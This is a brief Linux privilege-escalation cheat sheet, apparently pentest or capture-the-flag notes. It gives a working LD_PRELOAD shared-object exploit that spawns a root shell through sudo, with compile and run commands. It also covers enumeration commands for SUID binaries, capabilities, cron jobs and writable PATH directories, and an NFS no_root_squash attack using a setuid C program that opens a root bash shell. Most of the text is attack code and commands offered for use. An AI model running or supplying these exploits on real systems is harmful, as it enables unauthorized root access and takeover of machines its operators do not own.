Linux PrivEsc

Sudo Based Privilege Escalation

The holy bible of Linux Privesc: https://gtfobins.github.io/

Abusing sudo with LD_PRELOAD

You can abuse the LD_Preload sudo permission by writing and compiling the following C code. This will:

1. Check for LD_PRELOAD (with the env_keep option)

2. Write a simple C code compiled as a share object (.so extension) file

3. Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

#include <stdio.h>  
#include <sys/types.h>  
#include <stdlib.h>  
  
void _init() {  
unsetenv("LD_PRELOAD");  
setgid(0);  
setuid(0);  
system("/bin/bash");  
}

Save and compile using:

# Compile
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
# Run
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find

SUID based

find / -type f -perm -04000 -ls 2>/dev/null

Capabilities

getcap -r / 2>/dev/null

Cron Jobs

cat /etc/crontab
chmod 777 vulnfile.sh

Path

# Find writable locations in path
find / -writable 2>/dev/null
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

# Add tmp to path
export PATH=/tmp:$PATH

NSF

# For this example, assume the /tmp share has no_root_squash
# On then target machine
cat /etc/exports

# On the attackers machine, mount a share with the no_root_squash set.
showmount -e <ip>
mkdir /tmp/nsfpe
mount -o rw <ip>:/tmp /tmp/nsfpe

gcc nfs.c -o nfs -w
chmod +s nfs

# Back on the target machine
cd /tmp
./nfs

nfs.c:

int main(){
	setgid(0);
	setuid(0);
	system("/bin/bash");
	return 0;
}